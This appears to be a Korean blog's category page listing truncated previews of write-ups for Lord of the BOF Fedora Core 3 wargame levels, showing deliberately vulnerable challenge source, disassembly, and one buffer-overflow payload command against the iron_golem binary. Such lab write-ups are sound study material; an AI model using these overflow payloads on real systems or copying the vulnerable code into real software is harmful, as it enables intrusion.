wargame/LOB FC 썸네일형 리스트형 LOB FC3 [dark_eyes -> hell_fire] 를 풀다가 생긴 의문점에 대한 분석 1.왜 로 ret을 바꾸면 쉘이 따지는가? 먼저 그부분의 어셈블리를 한번 살펴보자. 0x75077f : call 0x743d30 0x750784 : mov ecx,DWORD PTR [ebx-316]0x75078a : xor edx,edx0x75078c : xor eax,eax0x75078e : mov DWORD PTR [ebx+5820],edx0x750794 : lea edx,[ebx-47601]0x75079a : mov edi,DWORD PTR [ecx]0x75079c : mov DWORD PTR [ebx+5816],eax0x7507a2 : mov DWORD PTR [esp+4],esi0x7507a6 : mov DWORD PTR [esp+8],edi0x7507aa : mov DWORD PTR [esp].. 더보기 LOB FC3 [dark_eyes -> hell_fire] [dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c/* The Lord of the BOF : The Fellowship of the BOF - hell_fire - Remote BOF on Fedora Core 3 - hint : another fake ebp or got overwriting - port : TCP 7777*/ #include int main(){ char buffer[256]; char saved_sfp[4]; char temp[1024]; printf("hell_fire : What's this smell?\n"); printf("you : "); fflush(stdout); // give me a food fgets(temp, 1024, stdin.. 더보기 LOB FC3 [iron_golem -> dark_eyes] [iron_golem@Fedora_1stFloor ~]$ cat dark_eyes.c/* The Lord of the BOF : The Fellowship of the BOF - dark_eyes - Local BOF on Fedora Core 3 - hint : RET sleding*/ int main(int argc, char *argv[]){ char buffer[256]; char saved_sfp[4]; if(argc < 2){ printf("argv error\n"); exit(0); } // save sfp memcpy(saved_sfp, buffer+264, 4); // overflow!! strcpy(buffer, argv[1]); // restore sfp memcpy(buffer+26.. 더보기 LOB FC3 [gate -> iron_golem] 를 풀다가 생긴 의문점에 대한 분석 1.왜 execve 대신 system을 사용하면 공격이 되지 않을까? [gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x3,"\xc0\x07\x75\x00"'`aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.. 더보기 LOB FC3 [gate -> iron_golem] 첫 문제이니 만큼 환경분석부터 시작하겠다.Fedora core 3 환경분석Stack Dummy : O [gate@Fedora_1stFloor ~]$ gcc -vReading specs from /usr/lib/gcc/i386-redhat-linux/3.4.2/specsConfigured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-java-awt=gtk --.. 더보기 이전 1 다음
